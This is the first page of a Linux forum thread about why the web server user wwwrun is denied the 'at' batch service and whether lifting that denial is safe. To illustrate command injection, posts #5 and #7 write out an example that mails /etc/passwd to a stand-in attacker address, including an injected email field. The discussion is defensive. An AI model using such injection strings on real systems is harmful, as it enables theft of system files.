Page 1 of 3 123 LastLast
Results 1 to 10 of 21

Thread: user wwwrun prevented from running batch

  1. #1
    Join Date
    Apr 2010
    Location
    Warsaw, Poland
    Posts
    202

    Question user wwwrun prevented from running batch

    I want to run a Web service that performs a lengthy calculation for the customer. If I let PHP perform the calculation, the script gets killed by server timeout. So I figured out it should initiate a batch job. However, the HTTP server process cannot initiate a batch job because user wwwrun is denied access to service at. Why is that so, and is it safe to remove this denial?

  2. #2
    Join Date
    Jun 2008
    Location
    UTC+10
    Posts
    9,683
    Blog Entries
    4

    Default Re: user wwwrun prevented from running batch

    Check if wwwrun is mentioned in /etc/at.deny. If so, removing it from that file will allow PHP to submit batch jobs. Apparmor may also impose restrictions if you have it running.

  3. #3
    Join Date
    Apr 2010
    Location
    Warsaw, Poland
    Posts
    202

    Question Re: user wwwrun prevented from running batch

    User wwwrun is listed in at.deny and I can remove it from there. However, I would like to know why it is the default setting and whether it is safe to remove it. Surely the maintainer who took the trouble to listing wwwrun in at.deny had something in mind when he did that, didn’t he? Since I cannot reproduce his reasoning, I kindly ask you for a hint.

  4. #4

    Default Re: user wwwrun prevented from running batch

    Quote Originally Posted by yecril71pl View Post
    User wwwrun is listed in at.deny and I can remove it from there. However, I would like to know why it is the default setting and whether it is safe to remove it. Surely the maintainer who took the trouble to listing wwwrun in at.deny had something in mind when he did that, didn’t he? Since I cannot reproduce his reasoning, I kindly ask you for a hint.
    If someone hacks your webserver somehow, he/she would be able to use at.
    It would be even better to not have at installed at all (on a webserver).

  5. #5
    Join Date
    Jun 2008
    Location
    UTC+10
    Posts
    9,683
    Blog Entries
    4

    Default Re: user wwwrun prevented from running batch

    The reasoning is that it's better to be safe than sorry. At is generally meant to be used by interactive accounts. If you have a need to use at from a system account, then you had better understand the risk involved. In other words, if you can't understand the reasoning, then perhaps you should learn why before you enable it.

    Let me give you a scenario. Suppose you somehow are silly enough to forget to sanitise user input and incorporate some input as part of a command that is sent to at. And suppose that user input was something like mail -s jackpot badguy@evilsite.com < /etc/passwd. Do you get the idea?

    You have to learn to think paranoid when it it comes to security.

  6. #6
    Join Date
    Apr 2010
    Location
    Warsaw, Poland
    Posts
    202

    Question Re: user wwwrun prevented from running batch

    Quote Originally Posted by herbwahn View Post
    It would be even better to not have at installed at all (on a webserver).
    But then I would be unable to run a batch job, and accordingly, to perform the task at hand? That would void the purpose of my server.

  7. #7
    Join Date
    Apr 2010
    Location
    Warsaw, Poland
    Posts
    202

    Default Re: user wwwrun prevented from running batch

    Quote Originally Posted by ken_yap View Post
    Let me give you a scenario. Suppose you somehow are silly enough to forget to sanitise user input and incorporate some input as part of a command that is sent to at. And suppose that user input was something like mail -s jackpot badguy@evilsite.com < /etc/passwd. Do you get the idea?
    Like somebody gives his e-mail address like this?
    badguy@evilsite.com;mail -s jackpot badguy@evilsite.com < /etc/passwd
    Quite an idea. Well, I have already been criticized here for using paranoid quotes in scripts…

    Is it better to enable user wwwrun or to call a setuid executable from PHP?

  8. #8
    Join Date
    Jun 2008
    Location
    UTC+10
    Posts
    9,683
    Blog Entries
    4

    Default Re: user wwwrun prevented from running batch

    You'll have to learn to evaluate the risks yourself. List in your head or on a piece of paper what the worst thing that could happen if something went wrong with the feature you propose to enable. Ask a friend to play adversary and propose bad scenarios for the feature.

    For example if I were an adversary, I would ask: Is your setuid script accessible to normal users? Is it accessible to other web applications? What would happen if someone were to run it interactively? Does it accept any input or arguments? What would happen if some evil input were fed to it? What would happen if even though it could only run one thing, yet somebody can create a denial of service by queuing up too many batch jobs? And so forth.

  9. #9
    Join Date
    Aug 2008
    Location
    Behind the 8 ball
    Posts
    116

    Default Re: user wwwrun prevented from running batch

    I want to run a Web service that performs a lengthy calculation for the customer.
    Can you just make a call to this process and then send it to the background instead of messing with at?

    Good luck,
    Hiatt

  10. #10
    Join Date
    Apr 2010
    Location
    Warsaw, Poland
    Posts
    202

    Exclamation Re: user wwwrun prevented from running batch

    Quote Originally Posted by jthiatt08 View Post
    Can you just make a call to this process and then send it to the background instead of messing with at?
    This would make an easy DOS; I need at to manage the jobs. The system does not support running them in parallel.
    Last edited by yecril71pl; 12-May-2011 at 09:12. Reason: better wording

Page 1 of 3 123 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •